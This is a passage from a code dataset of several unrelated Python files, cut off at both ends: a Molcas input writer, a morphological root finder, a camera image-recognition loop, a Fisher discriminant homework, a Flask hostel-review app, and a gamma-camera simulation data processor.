temp = temp + \"{char}{num}{pos0}{pos1}{pos2} Angstrom \\n\".format(char=chr(abc_code),\r\n num='{:<6d}'.format(i),\r\n pos0='{:10.4f}'.format(atom.pos[0]),\r\n pos1='{:10.4f}'.format(atom.pos[1]),\r\n pos2='{:10.4f}'.format(atom.pos[2]))\r\n i += 1\r\n temp = temp + \"End of basis\\n********************************************\\n\"\r\n string = string + temp\r\n if i >= 1000:\r\n print('WARNING: There are too many {0} atoms in mosaic shell, which cause the label of atoms at first '\r\n 'column has more than 4 characters.\\nIt will cause Molcas reduce the label to 4 characters and '\r\n 'cause *reduplicate* problem. e.g. \"A1000\" will be reduced to \"A100\" in Molcas.\\n'.format(key))\r\n abc_code = (abc_code - 65 + 1) % 26 + 65\r\n if (abc_code - 65 + 1) // 26 > 1:\r\n print('WARNING: Too many species in mosaic shell. The label of atoms at first column will be '\r\n '*reduplicate*.\\n')\r\n string = string + \"Xfield\\n{0} Angstrom\\n\".format(len(ion))\r\n for atom in ion:\r\n q = 0.0\r\n try:\r\n q = charge[atom.type]\r\n except KeyError:\r\n print('ERROR: The charge information about {0} is needed\\n'.format(atom.type))\r\n exit(1)\r\n string = string + \"{pos0}{pos1}{pos2}{charge} 0.0 0.0 0.0\\n\".format(pos0='{:10.4f}'.format(atom.pos[0]),\r\n pos1='{:10.4f}'.format(atom.pos[1]),\r\n pos2='{:10.4f}'.format(atom.pos[2]),\r\n charge='{:10.4f}'.format(q))\r\n string = string + 'AMFI\\nSDIPOLE\\nEnd of input \\n'\r\n if count > 500:\r\n print('\\nWARNING: The default max active atoms number in MOLCAS is 500, you have {0} active atoms in core '\r\n 'and mosaic structure. This may cause ERROR *RdCtl: Increase Mxdc* in sew calculation\\n'.format(count))\r\n with open(file_name, 'w') as fp:\r\n fp.write(string)\r\n\r\n\r\nif __name__ == '__main__':\r\n doped_crystal = 'o-o-o-c.vasp'\r\n substrate = 'hostsc960.vasp'\r\n c_r = 7\r\n s_r = 28\r\n m_r = 9.9\r\n doped_structure = poscar(doped_crystal)\r\n substrate_structure = poscar(substrate)\r\n doped_cluster, doped_center = build_cluster(doped_structure, c_r, tolerance=0.1)\r\n discard = cluster_from_substrate(substrate_structure, doped_center, c_r)\r\n if len(doped_cluster) != len(discard):\r\n print('WARNING: \\n'\r\n 'The number of atoms in cluster is different with the discard cluster of substrate.\\n'\r\n 'If there isn\\'t any intersitial or vacancy in doped structure, this disagreement may caused by the '\r\n 'choose of radius.\\n'\r\n 'The radius of cluster may be too small. Some atoms at the edge of sphere may be move out of the sphere'\r\n 'after the relaxed doped structure\\n')\r\n print('The number of difference is {0}'.format(len(doped_cluster) - len(discard)))\r\n shell = build_shell(substrate_structure, doped_center, c_r, s_r, pure_substrate=False, remove_dict={'Ti': 'Al'})\r\n cluster_embedded_structure = build_mosaic_structure(doped_cluster, shell)\r\n\r\n core_pseudo = {'Ti': 'Ti.ECP.Barandiaran.9s6p6d3f.3s3p4d1f.10e-CG-AIMP.',\r\n 'O': 'O.ECP.Barandiaran.5s6p1d.2s4p1d.6e-CG-AIMP.'}\r\n mosaic_pseudo = {'Al': 'Al.ECP.Pascual.0s.0s.0e-AIMP-Al2O3.',\r\n 'O': 'O.ECP.Pascual.0s.0s.0e-AIMP-Al2O3.'}\r\n charge = {'Al': 3, 'O': -2}\r\n write_seward_input(cluster_embedded_structure, core_pseudo, mosaic_pseudo, charge, m_r, title='Al2O3_Ti')\r\n","repo_name":"jingslaw/cluster_embedded_model","sub_path":"4_build_cluster_embedded_structure.py","file_name":"4_build_cluster_embedded_structure.py","file_ext":"py","file_size_in_byte":12894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23552218647","text":"#!python3\nimport sys\nimport pickle\nimport math\nfrom collections import defaultdict\nimport derinet.lexicon as dlex\n\nlexicon = dlex.Lexicon()\nlexicon.load('derinet/tools/data-api/derinet2/derinet-2-0.tsv')\n\ndef r_4(word, morph_stats):\n viable = [m for m in word if m in morph_stats.keys()]\n ms = [sum([morph_stats[x][i] for x in viable]) for i in range(3)]\n rts = min(viable, key = lambda x: sum([morph_stats[x][i]/(ms[i] + 0.00000000001) for i in [0,1,2]]))\n return [(rts, word.index(rts))]\n\ndef shortest_edit(w1, w2):\n known = defaultdict(lambda: defaultdict(int))\n strout = \"\"\n for i in range(len(w1)):\n known[i][-1] = i+1\n for j in range(len(w2)):\n known[-1][j] = j+1\n for i in range(len(w1)):\n for j in range(len(w2)):\n a = known[i-1][j-1]\n if w1[i] != w2[j]:\n a += 1\n b = known[i][j-1]+1\n c = known[i-1][j]+1\n res = min([a,b,c])\n known[i][j] = res\n x = i\n y = j\n while x > -1 or y > -1:\n a = known[x-1][y-1]\n b = known[x-1][y]\n c = known[x][y-1]\n res = min([a,b,c])\n if res == a and x > -1 and y > -1:\n strout = w2[y] + strout\n x -= 1\n y -= 1\n if w1[x+1] != w2[y+1]:\n strout = \"@\" + strout\n elif (res == b and b > c)or y < 0:\n x -= 1\n else:\n strout = \"@\" + w2[y] + strout\n y -= 1\n return [w2, known[i][j], strout]\n\ndef good(schema, shortest, lemmas):\n \"\"\"lemma contains the substring specified by \"schema\", \"shortest\" \"\"\"\n OK = True\n for lemma in lemmas:\n OK = any(all(lemma[j + i] == shortest[i] for i in schema) for j in range(-schema[0], len(lemma) - schema[-1]))\n if not OK:\n return False\n return True\n\ndef variants(schema, shortest, lemmas):\n \"\"\"generates possible variants of the schema\"\"\"\n schemata = []\n start = 0\n if len(schema)>0:\n start = schema[-1] + 1\n for j in range(start, len(shortest)):\n new_schema = schema + [j]\n if good(new_schema, shortest, lemmas):\n schemata.append(new_schema)\n return(schemata)\n\n#def prune(schemata, m):\n# \"\"\"groups schemata ending on the same position, returns the longest one\"\"\"\n# grouped = [[schema for schema in schemata if schema[-1] == i] for i in range(m)]\n# return [max(i_schemata, key=len) for i_schemata in grouped if len(i_schemata) > 0]\n\ndef get_schemata(lemmas):\n \"\"\"for lemmas, returns longest common substring (with wildcards)\"\"\"\n shortest = min(lemmas, key=len)\n schemata = [[]]\n max_len = -1\n new_max = 0\n new = []\n while(max_len < new_max):\n max_len = new_max\n for schema in schemata.copy():\n new_schemata = variants(schema, shortest, lemmas)\n if len(new_schemata) > 0 and schema in schemata:\n schemata.remove(schema)\n schemata = schemata + new_schemata\n if len(schemata[0]) == 0:\n return []\n #chemata = prune(schemata, len(shortest))\n new_max = len(max(schemata, key=len))\n\n schemata = [schema for schema in schemata if len(schema) == max_len]\n return [[(i - schema[0], shortest[i]) for i in schema] for schema in schemata]\n\ndef agrees(morph, schema):\n return any(all(morph[item[0] + j] == item[1] for item in schema) for j in range(len(morph) - schema[-1][0]))\n\ndef similarity(morph, schema):\n return min([0] + [sum([int(morph[item[0] + j] == item[1]) for item in schema]) for j in range(len(morph) - schema[-1][0])])\n\ndef subtree(lexeme, changes=1):\n r = lexeme\n while r.parent is not None and len(get_schemata([r.parent.lemma, r.lemma])) > len(r.lemma) - changes:\n r = r.parent\n return r\n\ndef roots(word, morph_stats):\n viable = [m for m in word if m in morph_stats.keys()]\n lexemes = lexicon.get_lexemes(lemma=\"\".join(word))\n if len(lexemes) == 0:\n return r_4(word, morph_stats)\n root = lexemes[0].get_tree_root()\n lemmas = [child.lemma.lower() for child in root.iter_subtree()]\n schemata = get_schemata(lemmas)\n candidates = []\n if len(schemata) > 0:\n candidates = [seg for seg in word if any(agrees(seg, schema) for schema in schemata)]\n if len(candidates) == 0:\n candidates = viable\n ws = [root.lemma] + [lex.lemma for lex in root.children]\n\n scored = {x: sum([shortest_edit(x, c)[1] for c in ws]) for x in word}\n snorm = sum(scored.values())\n viable = candidates\n ms = [sum([morph_stats[x][i] for x in viable]) for i in range(3)]\n minm = min(viable, key = lambda x: scored[x]/(snorm + 0.00000000001) + sum([morph_stats[x][i]/(ms[i] + 0.00000000001) for i in [0,1,2]]))\n return [(minm, word.index(minm))]\n","repo_name":"johnvojtech/morph_analysis","sub_path":"utils/roots.py","file_name":"roots.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10408063446","text":"\nimport cv2\nimport base, recognize, video_capture\nfrom skimage.measure import compare_ssim\nimport time\nfrom smb.SMBConnection import SMBConnection\nimport tempfile\nfrom datetime import datetime\n\nCAM_NAME = 'CAM6'\nUSER_NAME = 'Admin'\nPASS = '111'\nCLIENT_NAME = 'skzasutp0004'\nSERVER_NAME = 'VIDEOSRV-1'\nSERVER_IP = '192.168.0.1'\n\nFILE_FOLDER = 'Thumbs'\nFILE_NAME = 'cam6.jpg'\nSTORE_PATH = '/home/administrator/cam6/'\n\nSCORE_STOP = 0.95\nSTOP_CLASS = -1\nEMPTY_CLASS = 0\nDUST_CLASS = 2\nIMERROR_CLASS = 1\nBRBRIKET_CLASS = 3\nBRIKET_CLASS = 4\n\n\ndef list_to_dict(li):\n dct = {}\n ind = 0\n mx = 0.0\n ind_max = 0\n for item in li:\n dct[ind] = item\n if item > mx:\n ind_max = ind\n mx = item\n ind = ind + 1\n return dct, ind_max\n\n\ndef main():\n rc = recognize.RecognizeK2(store=True, store_path='img')\n bs = base.Psql()\n vc = video_capture.VideoCap()\n vc.start_capture('rtsp://admin:123456Qw@192.168.0.28:554/Streaming/channels/102')\n while True:\n time.sleep(10)\n try:\n im, file_create_time = vc.image()\n x1, x2, y1, y2 = bs.getcropimg()\n if x1 is None:\n continue\n (h, w) = im.shape[:2]\n point = (w / 2, h / 2)\n M = cv2.getRotationMatrix2D(point, -5, 1.0)\n im = cv2.warpAffine(im, M, (w, h))\n im = im[y1:y2, x1:x2]\n print('recognize')\n rc_result = rc.recognize(im)\n print(rc_result)\n im_l, img_guid, img_tfile = bs.loadimglast()\n if file_create_time == img_tfile:\n continue\n if im_l is not None and len(im_l) > 0:\n grayA_0 = cv2.cvtColor(cv2.resize(im[35:85, 144:194], (224, 224)), cv2.COLOR_BGR2GRAY)\n grayB_0 = cv2.cvtColor(cv2.resize(im_l[35:85, 144:194], (224, 224)), cv2.COLOR_BGR2GRAY)\n grayA_1 = cv2.cvtColor(cv2.resize(im[120:170, 3:53], (224, 224)), cv2.COLOR_BGR2GRAY)\n grayB_1 = cv2.cvtColor(cv2.resize(im_l[120:170, 3:53], (224, 224)), cv2.COLOR_BGR2GRAY)\n (score_0, diff_0) = compare_ssim(grayA_0, grayB_0, full=True)\n (score_1, diff_1) = compare_ssim(grayA_1, grayB_1, full=True)\n score = score_0 if score_0 < score_1 else score_1\n rc_result['sck'] = score\n print(score)\n if score > SCORE_STOP:\n bs.updateimglast(img_guid, score)\n bs.savestatistic(classforstatistic(rc_result))\n continue\n for x in range(1, 4):\n if 'snn' + str(x) in rc_result.keys():\n continue\n else:\n rc_result['snn' + str(x)] = ''\n rc_result['snn'] = classforstatistic(rc_result)\n bs.savedata(im, rc_result, file_create_time)\n bs.savestatistic(rc_result['snn'])\n print(rc_result)\n except Exception as e:\n print(e)\n\n finally:\n pass\n #conn.close()\n\ndef classforstatistic(data):\n if data['sck'] >= SCORE_STOP:\n return STOP_CLASS\n ik = int(max(data['fnn'], key=data['fnn'].get))\n if ik == 0:\n return EMPTY_CLASS\n if ik == 1:\n return IMERROR_CLASS\n return data['snn']\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"BEugen/AI-K2-UB","sub_path":"img-cam-recognize/grab-image-cam6.py","file_name":"grab-image-cam6.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71631778753","text":"from turtle import register_shape\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mlines\nfrom sklearn.metrics import accuracy_score\n\nclass fisher:\n def __init__(self, x, y, x_t, y_t):\n self.x = x\n self.y = y\n self.x_t = x_t\n self.y_t = y_t\n self.class_0 = []\n self.class_1 = []\n self.m1 = 0\n self.m2 = 0\n self.sw = 0\n self.sb = 0\n self.w = 0\n self.proj = 0\n self.proj_t = 0\n\n #compute the mean of two classes\n def mean_vectors(self):\n self.class_0, self.class_1 = [], []\n #count the number of class0 and class1\n for x, y in zip(self.x, self.y):\n if y == 0:\n self.class_0.append(x.flatten())\n else:\n self.class_1.append(x.flatten())\n \n self.class_0=np.asarray(self.class_0)\n self.class_1=np.asarray(self.class_1)\n #compute the mean\n self.m1 = np.mean(self.class_0, axis=0)\n self.m2 = np.mean(self.class_1, axis=0)\n\n print(f\"mean vector of class 1: {self.m1}\", f\"mean vector of class 2: {self.m2}\")\n\n #compute within class matrix \n def within_class_matrix(self):\n temp = np.subtract(self.class_0, self.m1)\n # print(temp.shape)\n temp_0 = np.dot(temp.T, temp)\n temp = np.subtract(self.class_1, self.m2)\n temp_1 = np.dot(temp.T, temp)\n #add two classes' within class matrix\n self.sw = np.add(temp_0, temp_1)\n print(f\"Within-class scatter matrix SW: {self.sw}\")\n\n #compute between class matrix\n def between_class_matrix(self):\n temp = self.m2 - self.m1\n temp = np.array(np.reshape(temp, (2,1)))\n self.sb = np.dot(temp, temp.T)\n\n print(f\"Between-class scatter matrix SB: {self.sb}\")\n\n #compute the w by fisher linear discrimination\n def fisher_linear_discrimination(self):\n self.w = np.dot(np.linalg.inv(self.sw), (self.m2 - self.m1))\n temp = self.w\n self.w = temp / np.linalg.norm(temp)\n \n print(f\" Fisher's linear discriminant: {self.w}\")\n\n #compare test data and pjoted train data, find the accuracy \n def compare(self):\n #compute projection\n proj = np.dot(self.w.T, self.x.T)\n proj_t = np.dot(self.w.T, self.x_t.T)\n self.proj = proj\n self.proj_t = proj_t\n \n #use k nearest neighbor to decide the class of test data\n for k in range(1,6) :\n y_pred = []\n for i in range(len(proj_t)):\n dist = np.abs(proj_t[i] - proj)\n nearest_neighbor_ids = dist.argsort()[:k]\n count_0 = 0\n count_1 = 0\n for idx in nearest_neighbor_ids:\n if self.y[idx] == 0:\n if k%2 == 0:\n count_0 += 1/dist[idx]\n else:\n count_0 += 1 \n else :\n if k%2 == 0:\n count_1 += 1/dist[idx]\n else:\n count_1 += 1\n\n if count_0 > count_1 :\n y_pred.append(0)\n else :\n y_pred.append(1)\n #use accuracy_score to compute the accuracy\n acc = accuracy_score(self.y_t, y_pred)\n print(f\" k : {k} Accuracy of test-set {acc}\")\n \n #plot the graph of test and train data and the line \n def plot(self):\n fig, ph = plt.subplots(figsize=(10,8))\n #project the line\n plt.plot([-self.w[0] * 4, self.w[0] * 7], [-self.w[1] * 4, self.w[1] * 7], lw=3, color='green', alpha=.4)\n colors=['red','blue']\n color = ['r.:', 'b.:']\n\n #link train data with its projectd data\n proj = []\n for i in self.proj :\n proj.append(i * self.w)\n \n for idx, i in enumerate(self.y):\n if i == 0 :\n plt.plot([proj[idx][0], self.x[idx][0]], [proj[idx][1], self.x[idx][1]], 'r', alpha=.3)\n else :\n plt.plot([proj[idx][0], self.x[idx][0]], [proj[idx][1], self.x[idx][1]], 'b', alpha=.3)\n\n #link test data with its projectd data\n # proj_t = []\n # for i in self.proj_t :\n # proj_t.append(i * self.w)\n # for idx, i in enumerate(self.y_t):\n # if i == 0 :\n # plt.plot([proj_t[idx][0], self.x_t[idx][0]], [proj_t[idx][1], self.x_t[idx][1]], 'r', alpha=.3)\n # else :\n # plt.plot([proj_t[idx][0], self.x_t[idx][0]], [proj_t[idx][1], self.x_t[idx][1]], 'b', alpha=.3)\n\n #plot train data and test data and the graph\n plt.scatter(self.x[:, 0], self.x[:, 1], color=[colors[i] for i in self.y], s = 10)\n # plt.scatter(self.x_t[:, 0], self.x_t[:, 1], color=[colors[i] for i in self.y_t], s = 10)\n plt.title(f\"Projection Line: w= {self.w[1]/self.w[0]}, b=0\")\n plt.xlabel(\"$x_1$\")\n plt.ylabel(\"$x_2$\")\n plt.show()\n\nif __name__ == '__main__':\n x_train, x_test, y_train, y_test = np.load('classification_data.npy', allow_pickle=True)\n # print(x_train.shape)\n # print(y_train.shape)\n # print(x_test.shape)\n # print(y_test.shape)\n \n #use the class fisher to represent all needed function and parameters\n fish=fisher(x_train, y_train, x_test, y_test)\n fish.mean_vectors()\n fish.within_class_matrix()\n fish.between_class_matrix()\n fish.fisher_linear_discrimination()\n fish.compare()\n fish.plot()","repo_name":"danzel-crazy/2023-Machine-Learning","sub_path":"HW2/109550164_hw2.py","file_name":"109550164_hw2.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19844602337","text":"from flask import Flask, render_template, request\nimport requests\nimport pandas as pd\nimport re\nimport ftfy\nimport nltk\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\n\n#This is the function that outputs recommendations for my app. You'll replace this with your function that takes in the user input and gives the output\ndef calcSent(myreviews):\n vader = SentimentIntensityAnalyzer()\n myneg = []\n myneu = []\n mypos = []\n mycompound = []\n\n for review in myreviews:\n snt = vader.polarity_scores(ftfy.fix_text(review))\n myneg.append(snt['neg'])\n myneu.append(snt['neu'])\n mypos.append(snt['pos'])\n mycompound.append(snt['compound'])\n return myneg, myneu, mypos, mycompound\n\ndef matchme(mytopfivenames, myhostels):\n t=pd.DataFrame()\n for named in mytopfivenames:\n keyrows = myhostels[myhostels.name.str.contains(named)]\n t=t.append(keyrows, ignore_index=True)\n return t\n\ndef findcomment(mykeyrows, mykey):\n if mykey == \"top\":\n mytemp = mykeyrows.sort_values(by='sentcomp', ascending=False)\n else:\n mytemp = mykeyrows.sort_values(by='sentcomp', ascending=True)\n return mytemp.reviewtext[:1].values\n\ndef findlink(myname, mylinks):\n myrow = mylinks[mylinks.name.str.contains(myname)]\n return myrow.url.values\n\ndef fixme(mytopfive, mytemp, mylinks):\n t=pd.DataFrame(columns= ['name','url','value','security','location','facilities','staff','atmosphere','cleanliness', 'topcomment', 'worstcomment'])\n for blah in mytopfive.itertuples():\n keyrows = mytemp[mytemp.name.str.contains(blah.name)]\n keylink = findlink(blah.name, mylinks)\n mytopcomment = findcomment(keyrows, \"top\")\n mybottomcomment = findcomment(keyrows, \"bottom\")\n\n if mytopcomment == mybottomcomment:\n mybottomcomment = [\"No other comments!\"]\n # temp=pd.DataFrame([])\n t=t.append({'name': blah.name, 'url': keylink, 'value': round(blah.value,ndigits=1), 'security': round(blah.security,ndigits=1),\n 'location': round(blah.location,ndigits=1), 'facilities': round(blah.facilities,ndigits=1), 'staff': round(blah.staff,ndigits=1),\n 'atmosphere': round(blah.atmosphere,ndigits=1), 'cleanliness': round(blah.cleanliness,ndigits=1), 'topcomment': mytopcomment,\n 'worstcomment': mybottomcomment}, ignore_index=True)\n return t\n\n#Initialize app\napp = Flask(__name__, static_url_path='/static')\n\n#Standard home page. 'index.html' is the file in your templates that has the CSS and HTML for your app\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html')\n\n\n#After they submit the survey, the index page redirects to dirt.html where dirt is rendered\n@app.route('/dirt', methods=['GET', 'POST'])\ndef dirt():\n\n ###THESE ARE FORM CRITERIA\n #1. user tells us city that they're interested in\n cityname = str(request.form['cityname'])\n #2. user also enters criterion for filtering\n criterion = str(request.form['rating'])\n #3 are we looking for the worst ones or the best ones?\n sortme = str(request.form['sortme'])\n ###END FORM CRITERIA\n\n #read in data as CSV\n hostels = pd.read_csv('data/hostelreviews-id.csv')\n links = pd.read_csv('data/hostellinks.csv')\n #okay, now we narrow the criteria to figure out which hostels\n #we'll be working with\n #First, by the criteria specified above,\n targethostels = hostels[ hostels.city == cityname ]\n tworeviews = targethostels['name'].value_counts()\n tworeviews =tworeviews[tworeviews > 5].index.tolist()\n targethostels = targethostels[targethostels['name'].isin(tworeviews)]\n print(targethostels)\n\n #now sort and group by the top specified values\n sorted = targethostels.groupby('name',as_index=False).mean()\n if sortme == 'best':\n sorted = sorted.sort_values(by=[criterion], ascending=False)\n else:\n sorted = sorted.sort_values(by=[criterion])\n tempfive = sorted[:5]\n #subset the relevant hostels in main comment set\n #before performing sentiment analysis and other stuff\n temp = matchme(tempfive.name, targethostels)\n\n #Now we need to calculate and return some sentiment (yeah!)\n neg,neu,pos,comp = calcSent(temp.reviewtext)\n temp = temp.assign(sentneg=neg, sentneu=neu, sentpos=pos, sentcomp=comp)\n\n #okay, now we need to consolidate all of the disparate information\n topfive= fixme(tempfive, temp, links)\n return render_template('dirt.html', topfive = topfive, criterion = criterion, cityname=cityname, sortme=sortme)\n\n\napp.run(debug=True)\n","repo_name":"ZhangWS/hosteldirt","sub_path":"MVP/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"72997152835","text":"import SimpleITK as sitk\nfrom hepunits import*\nfrom h5py import File\nimport numpy as np\nfrom copy import deepcopy\nfrom numba import jit\nfrom multiprocessing import Pool\n\n\nclass DataExtractor:\n\n def __init__(self, maxProcesses=32):\n self.maxProcesses = maxProcesses\n\n def extractData(self, filesPath):\n if isinstance(filesPath, list):\n with Pool(self.maxProcesses) as pool:\n return pool.map(self._extractData, filesPath)\n return self._extractData(filesPath)\n\n def _extractData(self, filePath):\n fileName = filePath.split(sep=\"/\")[-1]\n print(f'Reading {fileName}')\n file = File(filePath, 'r')\n data = self._dataExtraction(file)\n file.close()\n return data\n\n def _dataExtraction(self, file):\n data = {}\n if file['Modeling parameters/Subject'] is None:\n parameters = file['Modeling parameters/Space/Detector']\n # detector = Detector(\n # coordinates=parameters['coordinates'],\n # size=parameters['size'],\n # euler_angles=parameters['euler_angles'],\n # rotation_center=parameters['rotation_center']\n # )\n else:\n data = {\n 'Detector size': None,\n 'Interactions data': {}\n }\n interactions_data = file['Interactions data']\n for key in interactions_data.keys():\n data['Interactions data'].update({key: np.copy(interactions_data[key])})\n detector = file['Modeling parameters/Subject'].asstr()[()]\n data['Detector size'] = np.copy(file[f'Modeling parameters/Space/{detector}/size'])\n data['R'] = np.copy(file[f'Modeling parameters/Source/R'])\n data['Rotation center'] = np.copy(file[f'Modeling parameters/Source/rotation_center'])\n data['Origin'] = np.copy(file[f'Modeling parameters/Source/coordinates'])\n indicesSort = np.argsort(data['Interactions data']['Emission time'])\n interactions_data = data['Interactions data']\n for key in interactions_data.keys():\n interactions_data[key] = interactions_data[key][indicesSort]\n return data\n \n\nclass DataProcessor:\n\n def __init__(self):\n self.rng = np.random.default_rng()\n\n def addEmissionROI(self, data, emissionROI):\n coordinates = data['Coordinates']\n energyTransfer = data['Energy transfer']\n distanceTraveled = data['Distance traveled']\n emissionCoordinates = data['Emission coordinates']\n emissionTime = data['Emission time']\n emissionROI = np.asarray(emissionROI)\n ROI = np.all((emissionCoordinates >= emissionROI[:, 0])*(emissionCoordinates < emissionROI[:, 1]), axis=1)\n indices = np.nonzero(ROI)[0]\n data['Coordinates'] = coordinates[indices]\n data['Distance traveled'] = distanceTraveled[indices]\n data['Emission time'] = emissionTime[indices]\n data['Energy transfer'] = energyTransfer[indices]\n data['Emission coordinates'] = emissionCoordinates[indices]\n\n def addEnergyWindow(self, data, energyWindow):\n coordinates = data['Coordinates']\n distanceTraveled = data['Distance traveled']\n emissionTime = data['Emission time']\n energyTransfer = data['Energy transfer']\n emissionCoordinates = data['Emission coordinates']\n indices = np.nonzero((energyTransfer >= energyWindow[0])*(energyTransfer <= energyWindow[1]))\n data['Coordinates'] = coordinates[indices]\n data['Distance traveled'] = distanceTraveled[indices]\n data['Emission time'] = emissionTime[indices]\n data['Energy transfer'] = energyTransfer[indices]\n data['Emission coordinates'] = emissionCoordinates[indices]\n\n def addEnergyDeviation(self, data, energyResolution, referenceEnergy):\n energy = data['Energy transfer']\n coeff = np.sqrt(referenceEnergy)*energyResolution/100\n resolutionDistribution = coeff/np.sqrt(energy)\n sigma = resolutionDistribution*energy/2.355\n energy[:] = self.rng.normal(energy, sigma)\n\n def addCoordinatesDeviation(self, data, spatialResolution):\n coordinates = data['Coordinates']\n sigma = spatialResolution/2.35\n coordinates[:] = self.rng.normal(coordinates, sigma)\n\n def averageActs(self, data, decayTime, useDistanceTraveled=False):\n coordinates = data['Coordinates']\n energyTransfer = data['Energy transfer']\n emissionCoordinates = data['Emission coordinates']\n emissionTime = data['Emission time']\n distanceTraveled = data['Distance traveled']\n if useDistanceTraveled:\n registrationTime = emissionTime + distanceTraveled/c_light\n else:\n registrationTime = emissionTime\n timeWithDecay = self.addDecayTime(registrationTime, decayTime)\n _, indices, counts = np.unique(timeWithDecay, return_index=True, return_counts=True)\n eventsNumber = indices.size\n eventsIndices = [np.arange(indices[i], indices[i] + counts[i]) for i in range(eventsNumber)]\n averagedCoordinates = np.zeros((eventsNumber, 3), dtype=float)\n averagedDistanceTraveled = np.zeros(eventsNumber, dtype=float)\n averagedEmissionTime = np.zeros(eventsNumber, dtype=float)\n averagedEnergyTransfer = np.zeros(eventsNumber, dtype=float)\n averagedEmissionCoordinates = np.zeros((eventsNumber, 3), dtype=float)\n delIndices = []\n for i, actsIndices in enumerate(eventsIndices):\n weights = energyTransfer[actsIndices]\n if weights.sum() > 0:\n averagedCoordinates[i] = np.average(coordinates[actsIndices], axis=0, weights=weights)\n averagedDistanceTraveled[i] = np.average(distanceTraveled[actsIndices], weights=weights)\n averagedEmissionTime[i] = np.average(emissionTime[actsIndices], weights=weights)\n averagedEnergyTransfer[i] = np.sum(energyTransfer[actsIndices])\n averagedEmissionCoordinates[i] = np.average(emissionCoordinates[actsIndices], axis=0, weights=weights)\n else:\n delIndices.append(i)\n delIndices = np.array(delIndices, dtype=int)\n data['Coordinates'] = np.delete(averagedCoordinates, delIndices, axis=0)\n data['Distance traveled'] = np.delete(averagedDistanceTraveled, delIndices)\n data['Emission time'] = np.delete(averagedEmissionTime, delIndices)\n data['Energy transfer'] = np.delete(averagedEnergyTransfer, delIndices)\n data['Emission coordinates'] = np.delete(averagedEmissionCoordinates, delIndices, axis=0)\n\n @staticmethod\n def convertToLocalCoordinates(coordinates, origin, R, rotationCenter):\n \"\"\" Преобразовать в локальные координаты \"\"\"\n coordinates -= origin\n coordinates -= rotationCenter\n np.matmul(coordinates, R, out=coordinates)\n coordinates += rotationCenter\n coordinates += origin\n\n @staticmethod\n @jit(nopython=True, cache=True)\n def addDecayTime(time, decayTime):\n timeWithDecay = np.zeros_like(time)\n countdownTime = 0.\n for i, t in enumerate(time):\n if (t - countdownTime) > decayTime:\n countdownTime = t\n timeWithDecay[i] = countdownTime + decayTime\n return timeWithDecay\n \n\nclass DataConverter:\n\n def __init__(self, maxProcesses=32):\n self.maxProcesses = maxProcesses\n self.processingParameters = {\n 'decayTime': 300*ns,\n 'spatialResolution': 4.*mm,\n 'energyResolution': 9.9,\n 'referenceEnergy': 140.5*keV,\n 'energyChannels': 1024,\n 'energyRange': [0, 300*keV],\n 'energyWindow': [126*keV, 154*keV],\n 'imageRange': [[0., 51.2*cm], [0., 40.*cm]],\n 'pixelSize': 4.*mm,\n 'matrix': None,\n 'useDistanceTraveled': True,\n 'returnEnergySpectum': True,\n 'returnEmissionDistribution': True,\n 'emissionROI': [[0., 51.2*cm], [0., 40.*cm], [3.855*cm, 3.855*cm + 51.2*cm]]\n }\n self.scattersImageParameters = {\n 'decayTime': 0.,\n 'spatialResolution': 0.,\n 'energyResolution': 0.,\n 'referenceEnergy': 140.5*keV,\n 'energyWindow': [126*keV, 154*keV],\n 'imageRange': [[0., 51.2*cm], [0., 40.*cm]],\n 'pixelSize': 4.*mm,\n 'matrix': None,\n 'useDistanceTraveled': False,\n 'emissionROI': [[0., 51.2*cm], [0., 40.*cm], [3.855*cm, 3.855*cm + 51.2*cm]],\n 'peakEnergy': 140.5*keV\n }\n\n def _getMatrixAndImageRange(self, data, parameters):\n if parameters['imageRange'] is None:\n imageSize = data['Detector size'][:2]\n imageRange = np.column_stack([[0, 0], imageSize])\n else:\n imageRange = np.asarray(parameters['imageRange'])\n if parameters['matrix'] is None:\n matrix = np.round(((imageRange[:, 1] - imageRange[:, 0])/parameters['pixelSize'])).astype(int)\n else:\n matrix = np.asarray(parameters['matrix']).astype(int)\n return matrix, imageRange\n\n def convertToImage(self, data, processingParameters={}):\n print('\\tConverting to image')\n self.updateParameters(self.processingParameters, processingParameters)\n if isinstance(data, list):\n with Pool(min(len(data), self.maxProcesses)) as pool:\n return pool.map(self._convertToImage, data)\n return self._convertToImage(data)\n\n def convertToScattersImage(self, data, scattersImageParameters={}):\n print('\\tConverting to scatters image')\n self.updateParameters(self.scattersImageParameters, scattersImageParameters)\n if isinstance(data, list):\n with Pool(min(len(data), self.maxProcesses)) as pool:\n return pool.map(self._convertToScattersImage, data)\n return self._convertToScattersImage(data)\n\n def _acquireEnergySpectrum(self, processedData):\n processingParameters = self.processingParameters\n energySpectrum = list(np.histogram(\n processedData['Energy transfer'],\n bins=processingParameters['energyChannels'],\n range=processingParameters['energyRange']\n ))\n energySpectrum[1] = energySpectrum[1][1:]\n return np.array(energySpectrum)\n\n def _obtainEmissionDistrubution(self, emissionCoordinates):\n processingParameters = self.processingParameters\n emissionRange = np.asarray(processingParameters['emissionROI'])\n bins = np.round((emissionRange[:, 1] - emissionRange[:, 0])/processingParameters['pixelSize']).astype(int)\n emissionDistribution = np.histogramdd(\n emissionCoordinates,\n bins=bins,\n range=emissionRange\n )\n return emissionDistribution[0]\n\n def _convertToImage(self, data):\n processedData = self.processData(data['Interactions data'], self.processingParameters)\n matrix, imageRange = self._getMatrixAndImageRange(data, self.processingParameters)\n validEvents = self.cutToEnergyWindow(processedData['Energy transfer'], self.processingParameters['energyWindow'])\n coordinates = processedData['Coordinates'][validEvents]\n imageArray = 